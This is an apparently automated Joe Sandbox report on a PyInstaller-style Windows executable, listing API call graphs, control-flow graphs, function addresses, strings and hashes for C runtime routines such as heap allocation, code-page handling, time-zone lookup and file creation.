API calls 15646->15649 15648 7ff73ae2af0c __free_lconv_num 11 API calls 15647->15648 15650 7ff73ae33077 FreeEnvironmentStringsW 15648->15650 15649->15650 15650->15634 15653 7ff73ae29831 15652->15653 15654 7ff73ae2f158 memcpy_s 11 API calls 15653->15654 15667 7ff73ae29867 15654->15667 15655 7ff73ae2986f 15656 7ff73ae2af0c __free_lconv_num 11 API calls 15655->15656 15657 7ff73ae29767 15656->15657 15657->15614 15658 7ff73ae298e2 15659 7ff73ae2af0c __free_lconv_num 11 API calls 15658->15659 15659->15657 15660 7ff73ae2f158 memcpy_s 11 API calls 15660->15667 15661 7ff73ae298d1 15890 7ff73ae29a38 15661->15890 15663 7ff73ae2aa3c __std_exception_copy 37 API calls 15663->15667 15665 7ff73ae2af0c __free_lconv_num 11 API calls 15665->15655 15666 7ff73ae29907 15668 7ff73ae2aec4 _wfindfirst32i64 17 API calls 15666->15668 15667->15655 15667->15658 15667->15660 15667->15661 15667->15663 15667->15666 15669 7ff73ae2af0c __free_lconv_num 11 API calls 15667->15669 15670 7ff73ae2991a 15668->15670 15669->15667 15672 7ff73ae2b810 FlsSetValue 15671->15672 15673 7ff73ae2b7f5 FlsGetValue 15671->15673 15675 7ff73ae2b802 15672->15675 15676 7ff73ae2b81d 15672->15676 15674 7ff73ae2b80a 15673->15674 15673->15675 15674->15672 15677 7ff73ae2b808 15675->15677 15678 7ff73ae2aa9c __GetCurrentState 45 API calls 15675->15678 15679 7ff73ae2f158 memcpy_s 11 API calls 15676->15679 15691 7ff73ae32934 15677->15691 15680 7ff73ae2b885 15678->15680 15681 7ff73ae2b82c 15679->15681 15682 7ff73ae2b84a FlsSetValue 15681->15682 15683 7ff73ae2b83a FlsSetValue 15681->15683 15685 7ff73ae2b868 15682->15685 15686 7ff73ae2b856 FlsSetValue 15682->15686 15684 7ff73ae2b843 15683->15684 15688 7ff73ae2af0c __free_lconv_num 11 API calls 15684->15688 15687 7ff73ae2b4b8 memcpy_s 11 API calls 15685->15687 15686->15684 15689 7ff73ae2b870 15687->15689 15688->15675 15690 7ff73ae2af0c __free_lconv_num 11 API calls 15689->15690 15690->15677 15714 7ff73ae32ba4 15691->15714 15693 7ff73ae32969 15729 7ff73ae32634 15693->15729 15696 7ff73ae32986 15696->15631 15699 7ff73ae3299f 15700 7ff73ae2af0c __free_lconv_num 11 API calls 15699->15700 15700->15696 15701 7ff73ae329ae 15701->15701 15743 7ff73ae32cdc 15701->15743 15704 7ff73ae32aaa 15705 7ff73ae254c4 memcpy_s 11 API calls 15704->15705 15707 7ff73ae32aaf 15705->15707 15706 7ff73ae32b05 15709 7ff73ae32b6c 15706->15709 15754 7ff73ae32464 15706->15754 15710 7ff73ae2af0c __free_lconv_num 11 API calls 15707->15710 15708 7ff73ae32ac4 15708->15706 15711 7ff73ae2af0c __free_lconv_num 11 API calls 15708->15711 15713 7ff73ae2af0c __free_lconv_num 11 API calls 15709->15713 15710->15696 15711->15706 15713->15696 15715 7ff73ae32bc7 15714->15715 15716 7ff73ae32bd1 15715->15716 15769 7ff73ae30cb8 EnterCriticalSection 15715->15769 15719 7ff73ae32c43 15716->15719 15721 7ff73ae2aa9c __GetCurrentState 45 API calls 15716->15721 15719->15693 15722 7ff73ae32c5b 15721->15722 15724 7ff73ae32cb2 15722->15724 15726 7ff73ae2b7e4 50 API calls 15722->15726 15724->15693 15727 7ff73ae32c9c 15726->15727 15728 7ff73ae32934 65 API calls 15727->15728 15728->15724 15770 7ff73ae24f98 15729->15770 15732 7ff73ae32666 15734 7ff73ae3266b GetACP 15732->15734 15735 7ff73ae3267b 15732->15735 15733 7ff73ae32654 GetOEMCP 15733->15735 15734->15735 15735->15696 15736 7ff73ae2dbbc 15735->15736 15737 7ff73ae2dc07 15736->15737 15742 7ff73ae2dbcb memcpy_s 15736->15742 15738 7ff73ae254c4 memcpy_s 11 API calls 15737->15738 15740 7ff73ae2dc05 15738->15740 15739 7ff73ae2dbee RtlAllocateHeap 15739->15740 15739->15742 15740->15699 15740->15701 15741 7ff73ae33c00 memcpy_s 2 API calls 15741->15742 15742->15737 15742->15739 15742->15741 15744 7ff73ae32634 47 API calls 15743->15744 15745 7ff73ae32d09 15744->15745 15746 7ff73ae32e5f 15745->15746 15747 7ff73ae32d46 IsValidCodePage 15745->15747 15753 7ff73ae32d60 memcpy_s 15745->15753 15748 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 15746->15748 15747->15746 15749 7ff73ae32d57 15747->15749 15750 7ff73ae32aa1 15748->15750 15751 7ff73ae32d86 GetCPInfo 15749->15751 15749->15753 15750->15704 15750->15708 15751->15746 15751->15753 15802 7ff73ae3274c 15753->15802 15889 7ff73ae30cb8 EnterCriticalSection 15754->15889 15771 7ff73ae24fbc 15770->15771 15777 7ff73ae24fb7 15770->15777 15772 7ff73ae2b710 __GetCurrentState 45 API calls 15771->15772 15771->15777 15773 7ff73ae24fd7 15772->15773 15778 7ff73ae2df44 15773->15778 15777->15732 15777->15733 15779 7ff73ae2df59 15778->15779 15780 7ff73ae24ffa 15778->15780 15779->15780 15786 7ff73ae33974 15779->15786 15782 7ff73ae2dfb0 15780->15782 15783 7ff73ae2dfd8 15782->15783 15784 7ff73ae2dfc5 15782->15784 15783->15777 15784->15783 15799 7ff73ae32cc0 15784->15799 15787 7ff73ae2b710 __GetCurrentState 45 API calls 15786->15787 15788 7ff73ae33983 15787->15788 15789 7ff73ae339ce 15788->15789 15798 7ff73ae30cb8 EnterCriticalSection 15788->15798 15789->15780 15800 7ff73ae2b710 __GetCurrentState 45 API calls 15799->15800 15801 7ff73ae32cc9 15800->15801 15803 7ff73ae32789 GetCPInfo 15802->15803 15804 7ff73ae3287f 15802->15804 15803->15804 15808 7ff73ae3279c 15803->15808 15805 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 15804->15805 15807 7ff73ae3291e 15805->15807 15807->15746 15813 7ff73ae334b0 15808->15813 15814 7ff73ae24f98 45 API calls 15813->15814 15815 7ff73ae334f2 15814->15815 15833 7ff73ae2fc00 15815->15833 15835 7ff73ae2fc09 MultiByteToWideChar 15833->15835 15891 7ff73ae29a3d 15890->15891 15895 7ff73ae298d9 15890->15895 15892 7ff73ae29a66 15891->15892 15893 7ff73ae2af0c __free_lconv_num 11 API calls 15891->15893 15894 7ff73ae2af0c __free_lconv_num 11 API calls 15892->15894 15893->15891 15894->15895 15895->15665 15897 7ff73ae36c19 15896->15897 15898 7ff73ae36c30 15896->15898 15899 7ff73ae254c4 memcpy_s 11 API calls 15897->15899 15898->15897 15900 7ff73ae36c3e 15898->15900 15901 7ff73ae36c1e 15899->15901 15903 7ff73ae24f98 45 API calls 15900->15903 15904 7ff73ae36c29 15900->15904 15902 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 15901->15902 15902->15904 15903->15904 15904->15374 15906 7ff73ae24f98 45 API calls 15905->15906 15907 7ff73ae39849 15906->15907 15910 7ff73ae394a0 15907->15910 15912 7ff73ae394ee 15910->15912 15911 7ff73ae1bcc0 _wfindfirst32i64 8 API calls 15913 7ff73ae37ad5 15911->15913 15915 7ff73ae39560 GetCPInfo 15912->15915 15916 7ff73ae39575 15912->15916 15920 7ff73ae39579 15912->15920 15913->15374 15913->15401 15914 7ff73ae2fc00 _fread_nolock MultiByteToWideChar 15917 7ff73ae3960d 15914->15917 15915->15916 15915->15920 15916->15914 15916->15920 15918 7ff73ae2dbbc _fread_nolock 12 API calls 15917->15918 15919 7ff73ae39644 15917->15919 15917->15920 15918->15919 15919->15920 15921 7ff73ae2fc00 _fread_nolock MultiByteToWideChar 15919->15921 15920->15911 15922 7ff73ae396b2 15921->15922 15923 7ff73ae39794 15922->15923 15924 7ff73ae2fc00 _fread_nolock MultiByteToWideChar 15922->15924 15923->15920 15925 7ff73ae2af0c __free_lconv_num 11 API calls 15923->15925 15926 7ff73ae396d8 15924->15926 15925->15920 15926->15923 15927 7ff73ae2dbbc _fread_nolock 12 API calls 15926->15927 15928 7ff73ae39705 15926->15928 15927->15928 15928->15923 15929 7ff73ae2fc00 _fread_nolock MultiByteToWideChar 15928->15929 15930 7ff73ae3977c 15929->15930 15931 7ff73ae3979c 15930->15931 15932 7ff73ae39782 15930->15932 15939 7ff73ae2f428 15931->15939 15932->15923 15934 7ff73ae2af0c __free_lconv_num 11 API calls 15932->15934 15934->15923 15936 7ff73ae397db 15936->15920 15938 7ff73ae2af0c __free_lconv_num 11 API calls 15936->15938 15937 7ff73ae2af0c __free_lconv_num 11 API calls 15937->15936 15938->15920 15940 7ff73ae2f1d0 __crtLCMapStringW 5 API calls 15939->15940 15941 7ff73ae2f466 15940->15941 15942 7ff73ae2f690 __crtLCMapStringW 5 API calls 15941->15942 15944 7ff73ae2f46e 15941->15944 15943 7ff73ae2f4d7 CompareStringW 15942->15943 15943->15944 15944->15936 15944->15937 15946 7ff73ae3852a HeapSize 15945->15946 15947 7ff73ae38511 15945->15947 15948 7ff73ae254c4 memcpy_s 11 API calls 15947->15948 15949 7ff73ae38516 15948->15949 15950 7ff73ae2aea4 _invalid_parameter_noinfo 37 API calls 15949->15950 15951 7ff73ae38521 15950->15951 15951->15405 15953 7ff73ae30edb 15952->15953 15954 7ff73ae30ed1 15952->15954 15956 7ff73ae30ee0 15953->15956 15962 7ff73ae30ee7 memcpy_s 15953->15962 15955 7ff73ae2dbbc _fread_nolock 12 API calls 15954->15955 15961 7ff73ae30ed9 15955->15961 15957 7ff73ae2af0c __free_lconv_num 11 API calls 15956->15957 15957->15961 15958 7ff73ae30f1a HeapReAlloc 15958->15961 15958->15962 15959 7ff73ae30eed 15960 7ff73ae254c4 memcpy_s 11 API calls 15959->15960 15960->15961 15961->15410 15962->15958 15962->15959 15963 7ff73ae33c00 memcpy_s 2 API calls 15962->15963 15963->15962 15965 7ff73ae2f1d0 __crtLCMapStringW 5 API calls 15964->15965 15966 7ff73ae2f404 15965->15966 15966->15414 15968 7ff73ae255ae 15967->15968 15969 7ff73ae255d2 15967->15969 15973 7ff73ae2af0c __free_lconv_num 11 API calls 15968->15973 15977 7ff73ae255bd 15968->15977 15970 7ff73ae255d7 15969->15970 15971 7ff73ae2562c 15969->15971 15974 7ff73ae255ec 15970->15974 15970->15977 15978 7ff73ae2af0c __free_lconv_num 11 API calls 15970->15978 15972 7ff73ae2fc00 _fread_nolock MultiByteToWideChar 15971->15972 15984 7ff73ae25648 15972->15984 15973->15977 15975 7ff73ae2dbbc _fread_nolock 12 API calls 15974->15975 15975->15977 15976 7ff73ae2564f GetLastError 15989 7ff73ae25438 15976->15989 15977->15418 15977->15419 15978->15974 15980 7ff73ae2568a 15980->15977 15981 7ff73ae2fc00 _fread_nolock MultiByteToWideChar 15980->15981 15986 7ff73ae256ce 15981->15986 15983 7ff73ae2567d 15985 7ff73ae2dbbc _fread_nolock 12 API calls 15983->15985 15984->15976 15984->15980 15984->15983 15988 7ff73ae2af0c __free_lconv_num 11 API calls 15984->15988 15985->15980 15986->15976 15986->15977 15987 7ff73ae254c4 memcpy_s 11 API calls 15987->15977 15988->15983 15990 7ff73ae2b888 memcpy_s 11 API calls 15989->15990 15991 7ff73ae25445 __free_lconv_num 15990->15991 15992 7ff73ae2b888 memcpy_s 11 API calls 15991->15992 15993 7ff73ae25467 15992->15993 15993->15987 18941 7ff73ae1b240 18942 7ff73ae1b26e 18941->18942 18943 7ff73ae1b255 18941->18943 18943->18942 18945 7ff73ae2dbbc 12 API calls 18943->18945 18944 7ff73ae1b2cc 18945->18944 19855 7ff73ae31d20 19866 7ff73ae37cb4 19855->19866 19867 7ff73ae37cc1 19866->19867 19868 7ff73ae2af0c __free_lconv_num 11 API calls 19867->19868 19869 7ff73ae37cdd 19867->19869 19868->19867 19870 7ff73ae2af0c __free_lconv_num 11 API calls 19869->19870 19871 7ff73ae31d29 19869->19871 19870->19869 19872 7ff73ae30cb8 EnterCriticalSection 19871->19872

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 133 7ff73ae36370-7ff73ae363ab call 7ff73ae35cf8 call 7ff73ae35d00 call 7ff73ae35d68 140 7ff73ae363b1-7ff73ae363bc call 7ff73ae35d08 133->140 141 7ff73ae365d5-7ff73ae36621 call 7ff73ae2aec4 call 7ff73ae35cf8 call 7ff73ae35d00 call 7ff73ae35d68 133->141 140->141 147 7ff73ae363c2-7ff73ae363cc 140->147 167 7ff73ae36627-7ff73ae36632 call 7ff73ae35d08 141->167 168 7ff73ae3675f-7ff73ae367cd call 7ff73ae2aec4 call 7ff73ae31be8 141->168 149 7ff73ae363ee-7ff73ae363f2 147->149 150 7ff73ae363ce-7ff73ae363d1 147->150 151 7ff73ae363f5-7ff73ae363fd 149->151 153 7ff73ae363d4-7ff73ae363df 150->153 151->151 154 7ff73ae363ff-7ff73ae36412 call 7ff73ae2dbbc 151->154 156 7ff73ae363ea-7ff73ae363ec 153->156 157 7ff73ae363e1-7ff73ae363e8 153->157 163 7ff73ae3642a-7ff73ae36436 call 7ff73ae2af0c 154->163 164 7ff73ae36414-7ff73ae36416 call 7ff73ae2af0c 154->164 156->149 158 7ff73ae3641b-7ff73ae36429 156->158 157->153 157->156 174 7ff73ae3643d-7ff73ae36445 163->174 164->158 167->168 176 7ff73ae36638-7ff73ae36643 call 7ff73ae35d38 167->176 185 7ff73ae367db-7ff73ae367de 168->185 186 7ff73ae367cf-7ff73ae367d6 168->186 174->174 177 7ff73ae36447-7ff73ae36458 call 7ff73ae30e54 174->177 176->168 187 7ff73ae36649-7ff73ae3666c call 7ff73ae2af0c GetTimeZoneInformation 176->187 177->141 188 7ff73ae3645e-7ff73ae364b4 call 7ff73ae1d0e0 * 4 call 7ff73ae3628c 177->188 192 7ff73ae367e0 185->192 193 7ff73ae36815-7ff73ae36828 call 7ff73ae2dbbc 185->193 190 7ff73ae3686b-7ff73ae3686e 186->190 199 7ff73ae36672-7ff73ae36693 187->199 200 7ff73ae36734-7ff73ae3675e call 7ff73ae35cf0 call 7ff73ae35ce0 call 7ff73ae35ce8 187->200 245 7ff73ae364b6-7ff73ae364ba 188->245 194 7ff73ae367e3 190->194 196 7ff73ae36874-7ff73ae3687c call 7ff73ae36370 190->196 192->194 212 7ff73ae3682a 193->212 213 7ff73ae36833-7ff73ae3684e call 7ff73ae31be8 193->213 201 7ff73ae367e8-7ff73ae36814 call 7ff73ae2af0c call 7ff73ae1bcc0 194->201 202 7ff73ae367e3 call 7ff73ae365ec 194->202 196->201 206 7ff73ae3669e-7ff73ae366a5 199->206 207 7ff73ae36695-7ff73ae3669b 199->207 202->201 214 7ff73ae366b9 206->214 215 7ff73ae366a7-7ff73ae366af 206->215 207->206 219 7ff73ae3682c-7ff73ae36831 call 7ff73ae2af0c 212->219 228 7ff73ae36850-7ff73ae36853 213->228 229 7ff73ae36855-7ff73ae36867 call 7ff73ae2af0c 213->229 225 7ff73ae366bb-7ff73ae3672f call 7ff73ae1d0e0 * 4 call 7ff73ae331cc call 7ff73ae36884 * 2 214->225 215->214 222 7ff73ae366b1-7ff73ae366b7 215->222 219->192 222->225 225->200 228->219 229->190 247 7ff73ae364bc 245->247 248 7ff73ae364c0-7ff73ae364c4 245->248 247->248 248->245 250 7ff73ae364c6-7ff73ae364eb call 7ff73ae2706c 248->250 256 7ff73ae364ee-7ff73ae364f2 250->256 258 7ff73ae36501-7ff73ae36505 256->258 259 7ff73ae364f4-7ff73ae364ff 256->259 258->256 259->258 261 7ff73ae36507-7ff73ae3650b 259->261 264 7ff73ae3650d-7ff73ae36535 call 7ff73ae2706c 261->264 265 7ff73ae3658c-7ff73ae36590 261->265 273 7ff73ae36537 264->273 274 7ff73ae36553-7ff73ae36557 264->274 266 7ff73ae36597-7ff73ae365a4 265->266 267 7ff73ae36592-7ff73ae36594 265->267 269 7ff73ae365bf-7ff73ae365ce call 7ff73ae35cf0 call 7ff73ae35ce0 266->269 270 7ff73ae365a6-7ff73ae365bc call 7ff73ae3628c 266->270 267->266 269->141 270->269 277 7ff73ae3653a-7ff73ae36541 273->277 274->265 279 7ff73ae36559-7ff73ae36577 call 7ff73ae2706c 274->279 277->274 280 7ff73ae36543-7ff73ae36551 277->280 285 7ff73ae36583-7ff73ae3658a 279->285 280->274 280->277 285->265 286 7ff73ae36579-7ff73ae3657d 285->286 286->265 287 7ff73ae3657f 286->287 287->285
                                                        APIs
                                                        • _get_daylight.LIBCMT ref: 00007FF73AE363B5
                                                          • Part of subcall function 00007FF73AE35D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE35D1C
                                                          • Part of subcall function 00007FF73AE2AF0C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF22
                                                          • Part of subcall function 00007FF73AE2AF0C: GetLastError.KERNEL32(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF2C
                                                          • Part of subcall function 00007FF73AE2AEC4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF73AE2AEA3,?,?,?,?,?,00007FF73AE230CC), ref: 00007FF73AE2AECD
                                                          • Part of subcall function 00007FF73AE2AEC4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF73AE2AEA3,?,?,?,?,?,00007FF73AE230CC), ref: 00007FF73AE2AEF2
                                                        • _get_daylight.LIBCMT ref: 00007FF73AE363A4
                                                          • Part of subcall function 00007FF73AE35D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE35D7C
                                                        • _get_daylight.LIBCMT ref: 00007FF73AE3661A
                                                        • _get_daylight.LIBCMT ref: 00007FF73AE3662B
                                                        • _get_daylight.LIBCMT ref: 00007FF73AE3663C
                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF73AE3687C), ref: 00007FF73AE36663
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$BoundaryCurrentDeleteDescriptorErrorFeatureInformationLastPresentProcessProcessorTimeZone
                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                        • API String ID: 3714727158-239921721
                                                        • Opcode ID: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
                                                        • Instruction ID: eeacdfc7d36a17e1146b1cdeb97eeb046fffc1062d1d8f8cb94d3ab427a5a274
                                                        • Opcode Fuzzy Hash: 54e1ccf0b1e099ab2aef5fd1d20d70d6c7b19d4e9a74b58f9fc53268ba567377
                                                        • Instruction Fuzzy Hash: 37D1C26EE4825266FB60BF35D4531BAA3A1EF84B84FC04175DA0D47AC5DF3EE441A360

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 318 7ff73ae372bc-7ff73ae3732f call 7ff73ae36ff0 321 7ff73ae37349-7ff73ae37353 call 7ff73ae28434 318->321 322 7ff73ae37331-7ff73ae3733a call 7ff73ae254a4 318->322 327 7ff73ae3736e-7ff73ae373d7 CreateFileW 321->327 328 7ff73ae37355-7ff73ae3736c call 7ff73ae254a4 call 7ff73ae254c4 321->328 329 7ff73ae3733d-7ff73ae37344 call 7ff73ae254c4 322->329 331 7ff73ae373d9-7ff73ae373df 327->331 332 7ff73ae37454-7ff73ae3745f GetFileType 327->332 328->329 345 7ff73ae3768a-7ff73ae376aa 329->345 335 7ff73ae37421-7ff73ae3744f GetLastError call 7ff73ae25438 331->335 336 7ff73ae373e1-7ff73ae373e5 331->336 338 7ff73ae37461-7ff73ae3749c GetLastError call 7ff73ae25438 CloseHandle 332->338 339 7ff73ae374b2-7ff73ae374b9 332->339 335->329 336->335 343 7ff73ae373e7-7ff73ae3741f CreateFileW 336->343 338->329 352 7ff73ae374a2-7ff73ae374ad call 7ff73ae254c4 338->352 341 7ff73ae374bb-7ff73ae374bf 339->341 342 7ff73ae374c1-7ff73ae374c4 339->342 349 7ff73ae374ca-7ff73ae3751f call 7ff73ae2834c 341->349 342->349 350 7ff73ae374c6 342->350 343->332 343->335 357 7ff73ae3753e-7ff73ae3756f call 7ff73ae36d70 349->357 358 7ff73ae37521-7ff73ae3752d call 7ff73ae371f8 349->358 350->349 352->329 363 7ff73ae37571-7ff73ae37573 357->363 364 7ff73ae37575-7ff73ae375b7 357->364 358->357 365 7ff73ae3752f 358->365 366 7ff73ae37531-7ff73ae37539 call 7ff73ae2b084 363->366 367 7ff73ae375d9-7ff73ae375e4 364->367 368 7ff73ae375b9-7ff73ae375bd 364->368 365->366 366->345 371 7ff73ae375ea-7ff73ae375ee 367->371 372 7ff73ae37688 367->372 368->367 370 7ff73ae375bf-7ff73ae375d4 368->370 370->367 371->372 374 7ff73ae375f4-7ff73ae37639 CloseHandle CreateFileW 371->374 372->345 375 7ff73ae3766e-7ff73ae37683 374->375 376 7ff73ae3763b-7ff73ae37669 GetLastError call 7ff73ae25438 call 7ff73ae28574 374->376 375->372 376->375
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                        • String ID:
                                                        • API String ID: 1617910340-0
                                                        • Opcode ID: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
                                                        • Instruction ID: 8b8805d2d46d94d028e4b92193d2591972852dae45492f2206e1985f5be5368a
                                                        • Opcode Fuzzy Hash: d1d4f06f2925cf98ba43065425f03779d4007acc0884ea13a9d80746d18551ee
                                                        • Instruction Fuzzy Hash: 0FC1F23AF64A42A5FB10FF68C4922AC7761FB49BA8B804265DE2E573D4CF39D051E710

                                                        Control-flow Graph

                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF73AE1154F), ref: 00007FF73AE179E7
                                                          • Part of subcall function 00007FF73AE17B60: GetEnvironmentVariableW.KERNEL32(00007FF73AE13A1F), ref: 00007FF73AE17B9A
                                                          • Part of subcall function 00007FF73AE17B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF73AE17BB7
                                                          • Part of subcall function 00007FF73AE27DEC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE27E05
                                                        • SetEnvironmentVariableW.KERNEL32 ref: 00007FF73AE17AA1
                                                          • Part of subcall function 00007FF73AE12B30: MessageBoxW.USER32 ref: 00007FF73AE12C05
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                        • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                        • API String ID: 3752271684-1116378104
                                                        • Opcode ID: 7055df51aa8baa9cea4d529d496e5c2017cf8e1c57129ce6875fbf4dd1c833c4
                                                        • Instruction ID: 6211cd37f64dc97ff5f084d4dfca716672d606488915e7183716ea1fbf44d9d1
                                                        • Opcode Fuzzy Hash: 7055df51aa8baa9cea4d529d496e5c2017cf8e1c57129ce6875fbf4dd1c833c4
                                                        • Instruction Fuzzy Hash: C651C119F8926321F954B762E8532BAE2515F8AFC0FC454F5ED0E4B7D2EE2CE501B620

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 792 7ff73ae365ec-7ff73ae36621 call 7ff73ae35cf8 call 7ff73ae35d00 call 7ff73ae35d68 799 7ff73ae36627-7ff73ae36632 call 7ff73ae35d08 792->799 800 7ff73ae3675f-7ff73ae367cd call 7ff73ae2aec4 call 7ff73ae31be8 792->800 799->800 805 7ff73ae36638-7ff73ae36643 call 7ff73ae35d38 799->805 811 7ff73ae367db-7ff73ae367de 800->811 812 7ff73ae367cf-7ff73ae367d6 800->812 805->800 813 7ff73ae36649-7ff73ae3666c call 7ff73ae2af0c GetTimeZoneInformation 805->813 816 7ff73ae367e0 811->816 817 7ff73ae36815-7ff73ae36828 call 7ff73ae2dbbc 811->817 814 7ff73ae3686b-7ff73ae3686e 812->814 822 7ff73ae36672-7ff73ae36693 813->822 823 7ff73ae36734-7ff73ae3675e call 7ff73ae35cf0 call 7ff73ae35ce0 call 7ff73ae35ce8 813->823 818 7ff73ae367e3 814->818 819 7ff73ae36874-7ff73ae3687c call 7ff73ae36370 814->819 816->818 833 7ff73ae3682a 817->833 834 7ff73ae36833-7ff73ae3684e call 7ff73ae31be8 817->834 824 7ff73ae367e8-7ff73ae36814 call 7ff73ae2af0c call 7ff73ae1bcc0 818->824 825 7ff73ae367e3 call 7ff73ae365ec 818->825 819->824 828 7ff73ae3669e-7ff73ae366a5 822->828 829 7ff73ae36695-7ff73ae3669b 822->829 825->824 835 7ff73ae366b9 828->835 836 7ff73ae366a7-7ff73ae366af 828->836 829->828 839 7ff73ae3682c-7ff73ae36831 call 7ff73ae2af0c 833->839 847 7ff73ae36850-7ff73ae36853 834->847 848 7ff73ae36855-7ff73ae36867 call 7ff73ae2af0c 834->848 844 7ff73ae366bb-7ff73ae3672f call 7ff73ae1d0e0 * 4 call 7ff73ae331cc call 7ff73ae36884 * 2 835->844 836->835 842 7ff73ae366b1-7ff73ae366b7 836->842 839->816 842->844 844->823 847->839 848->814
                                                        APIs
                                                        • _get_daylight.LIBCMT ref: 00007FF73AE3661A
                                                          • Part of subcall function 00007FF73AE35D68: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE35D7C
                                                        • _get_daylight.LIBCMT ref: 00007FF73AE3662B
                                                          • Part of subcall function 00007FF73AE35D08: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE35D1C
                                                        • _get_daylight.LIBCMT ref: 00007FF73AE3663C
                                                          • Part of subcall function 00007FF73AE35D38: _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AE35D4C
                                                          • Part of subcall function 00007FF73AE2AF0C: RtlDeleteBoundaryDescriptor.NTDLL(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF22
                                                          • Part of subcall function 00007FF73AE2AF0C: GetLastError.KERNEL32(?,?,?,00007FF73AE33392,?,?,?,00007FF73AE333CF,?,?,00000000,00007FF73AE33895,?,?,00000000,00007FF73AE337C7), ref: 00007FF73AE2AF2C
                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF73AE3687C), ref: 00007FF73AE36663
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
